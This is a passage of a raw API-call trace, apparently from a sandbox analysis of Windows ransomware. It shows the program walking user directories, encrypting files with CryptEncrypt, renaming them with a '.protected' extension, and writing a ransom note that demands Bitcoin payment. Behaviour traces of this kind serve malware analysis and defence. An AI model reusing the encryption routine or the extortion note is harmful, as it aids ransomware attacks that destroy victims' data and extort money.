lpFindFileData=0x295ef20) returned 0x47b9d0 [0094.812] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.812] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.812] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.812] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.812] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.812] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\.") returned 39 [0094.812] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.812] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.812] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.812] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.812] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.812] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.812] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.812] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\..") returned 40 [0094.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.812] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.812] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0094.812] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0094.812] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0094.812] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0094.812] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0094.812] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft") returned 47 [0094.812] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0094.812] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0094.813] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*") returned 49 [0094.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0094.814] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.814] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.814] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.814] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.814] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.814] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\.") returned 49 [0094.814] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.814] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.814] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.814] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0094.814] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0094.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.814] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.814] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.814] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.814] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.814] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.814] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.815] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\..") returned 50 [0094.815] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.815] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.815] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.815] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.815] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0094.815] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0094.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\.." (normalized: "c:\\users\\default\\appdata\\locallow"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.815] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.815] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Windows") returned -1 [0094.815] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Program Files") returned -1 [0094.815] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Program Files (x86)") returned -1 [0094.815] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="$Recycle.bin") returned 1 [0094.815] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="System Volume Information") returned -1 [0094.815] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned 64 [0094.815] lstrcmpW (lpString1="CryptnetUrlCache", lpString2=".") returned 1 [0094.815] lstrcmpW (lpString1="CryptnetUrlCache", lpString2="..") returned 1 [0094.815] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*") returned 66 [0094.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.816] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.816] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.816] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.816] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.816] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.816] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.") returned 66 [0094.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.816] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.816] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.816] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.816] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.816] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.816] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.816] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.816] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.816] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.816] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.816] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\..") returned 67 [0094.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.816] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.816] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.816] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.816] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.816] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.816] lstrcmpiW (lpString1="Content", lpString2="Windows") returned -1 [0094.816] lstrcmpiW (lpString1="Content", lpString2="Program Files") returned -1 [0094.816] lstrcmpiW (lpString1="Content", lpString2="Program Files (x86)") returned -1 [0094.817] lstrcmpiW (lpString1="Content", lpString2="$Recycle.bin") returned 1 [0094.817] lstrcmpiW (lpString1="Content", lpString2="System Volume Information") returned -1 [0094.817] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned 72 [0094.817] lstrcmpW (lpString1="Content", lpString2=".") returned 1 [0094.817] lstrcmpW (lpString1="Content", lpString2="..") returned 1 [0094.817] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*") returned 74 [0094.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.817] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.817] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.817] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.817] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.817] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.817] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.") returned 74 [0094.817] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.817] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.817] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.817] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.817] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.817] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.817] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.817] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.817] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.817] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.817] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.817] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\..") returned 75 [0094.817] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.817] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.818] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.818] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.818] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.818] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.818] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.818] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Windows") returned -1 [0094.818] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files") returned -1 [0094.818] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files (x86)") returned -1 [0094.818] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="$Recycle.bin") returned 1 [0094.818] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="System Volume Information") returned -1 [0094.818] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 105 [0094.818] StrStrIW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".protected") returned 0x0 [0094.818] lstrcmpW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="RESTORE_FILES.txt") returned -1 [0094.818] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.818] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.819] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 105 [0094.819] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0094.819] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 105 [0094.819] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".rar") returned 0x0 [0094.819] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 105 [0094.819] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".zip") returned 0x0 [0094.819] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x228, lpOverlapped=0x0) returned 1 [0094.820] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.820] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x228, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x228, lpOverlapped=0x0) returned 1 [0094.820] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.820] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.820] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.820] CloseHandle (hObject=0x150) returned 1 [0094.820] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected") returned 115 [0094.820] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.protected")) returned 1 [0094.823] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.823] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Windows") returned -1 [0094.823] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files") returned -1 [0094.823] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files (x86)") returned -1 [0094.823] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="$Recycle.bin") returned 1 [0094.823] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="System Volume Information") returned -1 [0094.823] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 105 [0094.823] StrStrIW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".protected") returned 0x0 [0094.823] lstrcmpW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="RESTORE_FILES.txt") returned -1 [0094.823] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.823] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.824] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 105 [0094.824] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0094.824] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 105 [0094.824] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".rar") returned 0x0 [0094.824] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 105 [0094.824] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".zip") returned 0x0 [0094.824] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0094.824] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.824] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0094.824] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.824] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.825] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.825] CloseHandle (hObject=0x150) returned 1 [0094.825] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.protected") returned 115 [0094.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.protected" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.protected")) returned 1 [0094.825] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.826] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.826] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\RESTORE_FILES.txt") returned 90 [0094.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.832] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.832] WriteFile (in: 